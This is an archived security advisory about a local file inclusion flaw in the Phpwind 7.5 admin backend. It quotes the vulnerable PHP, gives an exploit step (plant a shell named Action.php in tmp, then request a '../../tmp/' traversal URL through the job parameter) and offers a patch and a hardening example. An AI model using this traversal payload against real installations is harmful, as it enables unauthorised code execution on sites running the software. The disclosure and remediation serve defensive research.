Phpwind7.5 Admin Backend Local File Inclusion Vulnerability

Friday, February 5, 2010

SSV ID:19065
SEBUG-Appdir:PHPWind
Published:2010-02-05
Vulnerable:
Phpwind7.5
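Description:
File: hack\rate\admin.php

Source:

    <?php
    !function_exists('readover') && exit('Forbidden');
    define ( "H_R", R_P . "hack/rate/" );
    define ( "L_R", R_P . "lib/" );
    InitGP ( array ('ajax' ) );
    // $action is taken from the request parameter $job
    $action = strtolower ( ($job) ? $job : "admin" );
    // the include path is built from $action with no path check
    $filepath = H_R . "action/" . $action . "Action.php";

    (! file_exists ( $filepath )) && exit ();

    if ($job != "ajax") {
        require H_R . '/template/layout.php';
    } else {
        require_once $filepath;
    }

    ?>

Now look at hack\rate\template\layout.php:

    <?php
    !function_exists('readover') && exit('Forbidden');
    include_once PrintEot ( 'left' );
    print <<<EOT
    -->
    EOT;
    // $filepath set in admin.php is included here
    require_once $filepath;
    include_once PrintEot ( 'adminbottom' );
    ?>

$job can be set by the requester, which triggers a local file inclusion. The value has been passed through addslashes, so it cannot be truncated with %00; it can, however, be truncated with a run of slashes (///////), or a shell can be written directly into the tmp folder and then included.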
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive; they are only for security research and teaching. Use at your own risk!
First upload a shell named Action.php into tmp, then visit:
http://127.0.0.1/pw/admin.php?adminjob=hack&hackset=rate&typeid=100&job=../../../../../../tmp/
SEBUG Solution:
Temporary patch: replace

    $filepath = H_R . "action/" . $action . "Action.php";

with:

    $filepath = Pcv(H_R . "action/" . $action . "Action.php");
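As an added example (not PHPWind code and not the implementation of Pcv()), the same dispatch can be hardened by allowlisting the action name and confirming that the resolved file sits inside the action directory. The helper name resolve_action_file and the demo directory layout are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helper, not PHPWind code and not the body of Pcv().
// Resolves an action name to a file directly under $actionDir, or returns null.
function resolve_action_file(string $actionDir, string $job): ?string
{
    // 1. Allowlist the name: letters, digits and underscore only, so "../",
    //    runs of slashes and NUL bytes never reach the filesystem.
    $action = strtolower($job === '' ? 'admin' : $job);
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $action)) {
        return null;
    }

    // 2. Canonicalise both paths; realpath() resolves symlinks and ".." and
    //    returns false when the target does not exist.
    $base = realpath($actionDir);
    $path = realpath($actionDir . DIRECTORY_SEPARATOR . $action . 'Action.php');
    if ($base === false || $path === false) {
        return null;
    }

    // 3. Containment: the resolved file must sit directly in the action directory.
    if (dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Constructed demonstration in a throwaway directory.
$root = sys_get_temp_dir() . '/rate_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/action', 0700, true);
file_put_contents($root . '/action/adminAction.php', "<?php // constructed sample\n");
file_put_contents($root . '/Action.php', "<?php // file outside action/\n");

foreach (['admin', '', '../', '../../../../../../tmp/', 'admin/////'] as $job) {
    $resolved = resolve_action_file($root . '/action', $job);
    printf("%-28s => %s\n", var_export($job, true), $resolved ?? 'rejected');
}

// Remove the constructed files again.
unlink($root . '/action/adminAction.php');
unlink($root . '/Action.php');
rmdir($root . '/action');
rmdir($root);
```

Only 'admin' and the empty default resolve to adminAction.php; the traversal and slash-padded values are rejected before any include would run.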
// sebug.net [2010-02-05]